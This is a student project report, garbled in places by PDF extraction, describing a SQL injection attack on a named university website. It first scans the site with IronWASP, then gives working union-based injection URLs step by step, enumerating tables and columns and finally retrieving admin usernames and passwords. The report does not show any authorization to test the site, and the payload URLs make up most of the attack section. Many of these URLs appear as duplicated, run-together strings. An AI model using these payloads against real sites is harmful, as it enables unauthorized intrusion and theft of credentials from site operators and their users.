SQL Injection - Project Report

8/10/2019 SQL Injection - Project Report

1/14


2/14

ii

PREFACE

It gives me a sense of satisfaction and pleasure at the same time while writing the

preface for the IRONWASP project report. It took several weeks of immense hard work andtiredness to complete this project.

My intention has been to produce a report which covers completely all the aspects of

this project. Therefore, I have presented the project report in a way which is accessible to

everyone.

As use of the computers in industry, commerce, education and many other fields of

life have become very common; the question of information and system security arises.

Avoiding attacks on information and network wouldnt be that easy. It requires a lot of effort

to avoid these attacks. This report discusses SQL injection vulnerability identification and

attacking.

A thorough study has been carried out of the topic. All the material has been collected

in relevance with the SQL injection vulnerability. This report is carefully designed to offer

information appropriate for SQL Injection vulnerability. All the topics are comprehensively

dealt with to give reader a firm grounding in the issue. Explanations of concepts and

principles are concise and written in clear and simple language with supportive illustrations

where required. Different diagrams are provided to make this report even more logical and

understandable for the reader.

Muhammad Burhan


3/14


4/14


5/14

v

INTRODUCTION

1 IntroductionThis chapter gives a brief introduction to the project. It provides the objective,

theoretical background and project scope.

1.1 Objective

The aim of my project is to attack on a website using IRONWASP for SQL Injection

vulnerability detection and also attack on effected website using SQL Injection.

1.2 Theoretical Background

What is SQL injection?

SQL injection is a code injection technique, used to attack data-driven

applications, in which malicious SQL statements are inserted into an entry field for

execution (e.g. to dump the database contents to the attacker).

What is software vulnerability?

Software vulnerability is a security flaw, glitch, or weakness found

insoftware or in an operating system (OS) that can lead to security concerns. An

example of a software flaw is a buffer overflow.

What is IronWASP?


6/14

vi

IronWASP (Iron Web application Advanced Security testing Platform) is one

of the world's best web vulnerability scanners.

1.3 Project Scope

1- To understand and demonstrate the working of Iron Wasp.

2- Identify vulnerability using Iron Wasp.

3- Perform attack using SQL Injection.


7/14


8/14

viii

Figure 1: Iron WASP Interface

2.2 Reasons for Iron WASP Selection

1- It's Free and Open source.

2- GUI based and very easy to use, no security expertise required.3- Powerful and effective scanning engine.

4- Supports recording Login sequence.

5- Reporting in both HTML and RTF formats.

6- Checks for over 25 different kinds of web vulnerabilities.

7- False Positives detection support.

8- False Negatives detection support.

9- Industry leading built-in scripting engine that supports Python and Ruby.

10- Extensible via plug-ins or modules in Python, Ruby, C# or VB.NET.

11- Comes bundled with a growing number of Modules built by researchers in the

security community.


9/14


10/14

x

The university offers several under graduate programs (BS, BSc, BBA, etc) as well as

graduate programs (MBA, etc). Figure 3 shows that SQL injection detected on the university

website (i.e. http://www.thelaureate.edu.pk ).

Figure 2: Target website.

Figure 3: SQL Injection Vulnerability Detected

2.3 Start Attack

Step 1: Use order by clause to find the number columns in table.

Use order by clause and increase column number 1, 2, 3 n till you get error.

For Example:
http://www.thelaureate.edu.pk/http://www.thelaureate.edu.pk/http://www.thelaureate.edu.pk/http://www.thelaureate.edu.pk/


11/14

xi

http://www.thelaureate.edu.pk/contents.php?id=10+order+by+1



:

:


Figure 4 show that on 7 th column we find following error as shown in figure 4 which

means that we have only 6 columns in table which is displaying data.

Figure 4: Shows error on 7 th column.

Step 2: Finding columns that are displaying on page.

To find the columns that are displaying on web page we have use a union

query f or example:

http://www.thelaureate.edu.pk/contents.php?id=10+union+select+1,2,3,4,5,6+order+by+1

Figure 5: Displayed Columns.

Step 3: Using group_concat function.

To group_concat function is used to display all table names of the given

schema. For example:
http://www.thelaureate.edu.pk/contents.php?id=10+order+by+1http://www.thelaureate.edu.pk/contents.php?id=10+order+by+1http://www.thelaureate.edu.pk/contents.php?id=10+order+by+2http://www.thelaureate.edu.pk/contents.php?id=10+order+by+2http://www.thelaureate.edu.pk/contents.php?id=10+order+by+3http://www.thelaureate.edu.pk/contents.php?id=10+order+by+3http://www.thelaureate.edu.pk/contents.php?id=10+order+by+7http://www.thelaureate.edu.pk/contents.php?id=10+order+by+7http://www.thelaureate.edu.pk/contents.php?id=10+union+select+1,2,3,4,5,6+order+by+1http://www.thelaureate.edu.pk/contents.php?id=10+union+select+1,2,3,4,5,6+order+by+1http://www.thelaureate.edu.pk/contents.php?id=10+union+select+1,2,3,4,5,6+order+by+1http://www.thelaureate.edu.pk/contents.php?id=10+union+select+1,2,3,4,5,6+order+by+1http://www.thelaureate.edu.pk/contents.php?id=10+order+by+7http://www.thelaureate.edu.pk/contents.php?id=10+order+by+3http://www.thelaureate.edu.pk/contents.php?id=10+order+by+2http://www.thelaureate.edu.pk/contents.php?id=10+order+by+1


12/14

xii

http://www.thelaureate.edu.pk/contents.php?id=10+union+select+1,2,3,group_concat(table_name)+,5,6+from+information_schema.tables+where+table_schema=database()+order+by+1

The above link displayed few tables belongs the current schema:

admin,e-news, email_group, email_management, image_gallery, images_listing, navigation,navigation_bk, news_and_events, notice_board and pages .

Figure 6: Table names.

Step 4: Find hex of the target table.

We have to enter hex code for table name in the query to execute this

successfully. The admin table is looking more interesting. Therefore I find the hex code of

admin which is 61646d696e .

Step 5: Finding column names of the table.

Group_concat will be use to display the column names. For example:

http://www.thelaureate.edu.pk/contents.php?id=10+union+select+1,2,3,group_concat(column _name)+,5,6+from+information_schema.columns+where+table_name=0x61646d696e+order +by+1

Figure 7: Shows the column names of admin table.

Step 6: Retrieving data.In last step I successfully retrieved the column names (i.e. username and

password). So I use the below mentioned URL to retrieve data. Figure 8 shows the results ofadmin table.
http://www.thelaureate.edu.pk/contents.php?id=10+union+select+1,2,3,group_concat(table_name)+,5,6+from+information_schema.tables+where+table_schema=database()+order+by+1http://www.thelaureate.edu.pk/contents.php?id=10+union+select+1,2,3,group_concat(table_name)+,5,6+from+information_schema.tables+where+table_schema=database()+order+by+1http://www.thelaureate.edu.pk/contents.php?id=10+union+select+1,2,3,group_concat(table_name)+,5,6+from+information_schema.tables+where+table_schema=database()+order+by+1http://www.thelaureate.edu.pk/contents.php?id=10+union+select+1,2,3,group_concat(column_name)+,5,6+from+information_schema.columns+where+table_name=0x61646d696e+order+by+1http://www.thelaureate.edu.pk/contents.php?id=10+union+select+1,2,3,group_concat(column_name)+,5,6+from+information_schema.columns+where+table_name=0x61646d696e+order+by+1http://www.thelaureate.edu.pk/contents.php?id=10+union+select+1,2,3,group_concat(column_name)+,5,6+from+information_schema.columns+where+table_name=0x61646d696e+order+by+1http://www.thelaureate.edu.pk/contents.php?id=10+union+select+1,2,3,group_concat(column_name)+,5,6+from+information_schema.columns+where+table_name=0x61646d696e+order+by+1http://www.thelaureate.edu.pk/contents.php?id=10+union+select+1,2,3,group_concat(column_name)+,5,6+from+information_schema.columns+where+table_name=0x61646d696e+order+by+1http://www.thelaureate.edu.pk/contents.php?id=10+union+select+1,2,3,group_concat(column_name)+,5,6+from+information_schema.columns+where+table_name=0x61646d696e+order+by+1http://www.thelaureate.edu.pk/contents.php?id=10+union+select+1,2,3,group_concat(column_name)+,5,6+from+information_schema.columns+where+table_name=0x61646d696e+order+by+1http://www.thelaureate.edu.pk/contents.php?id=10+union+select+1,2,3,group_concat(table_name)+,5,6+from+information_schema.tables+where+table_schema=database()+order+by+1http://www.thelaureate.edu.pk/contents.php?id=10+union+select+1,2,3,group_concat(table_name)+,5,6+from+information_schema.tables+where+table_schema=database()+order+by+1


13/14

xiii

http://www.thelaureate.edu.pk/contents.php?id=10+union+select+1,2,+username+,+password+,5,6+from+admin+order+by+1

Figure 8: Shows the data of admin table.

Step 7: Beyond this is not ethical.I feel that moving ahead like delete, modify and inserting data into tables is

not ethical.

Chapter 3

CONCLUSION

3 Conclusion

As you have seen that I demonstrate the SQL injection technique. So we can insert,

update and delete any data and as well as database objects (like tables, views etc) using SQL

injection.

Therefore the desktop and web applications should be build on standards to avoid

attacks. Now-a-days there are several software products available which show the availability

of vulnerability in web and desktop applications.
http://www.thelaureate.edu.pk/contents.php?id=10+union+select+1,2,+username+,+password+,5,6+from+admin+order+by+1http://www.thelaureate.edu.pk/contents.php?id=10+union+select+1,2,+username+,+password+,5,6+from+admin+order+by+1http://www.thelaureate.edu.pk/contents.php?id=10+union+select+1,2,+username+,+password+,5,6+from+admin+order+by+1http://www.thelaureate.edu.pk/contents.php?id=10+union+select+1,2,+username+,+password+,5,6+from+admin+order+by+1http://www.thelaureate.edu.pk/contents.php?id=10+union+select+1,2,+username+,+password+,5,6+from+admin+order+by+1


14/14

xiv

APPENDIX A

WEB REFERENCES

Web References[1] http://www.thelaureate.edu.pk (Target Website)

[2] http://string-functions.com/string-hex.aspx (Convert String to Hex)
http://www.thelaureate.edu.pk/http://www.thelaureate.edu.pk/http://string-functions.com/string-hex.aspxhttp://string-functions.com/string-hex.aspxhttp://string-functions.com/string-hex.aspxhttp://www.thelaureate.edu.pk/

SQL Injection - Project Report

Documents

Transcript of SQL Injection - Project Report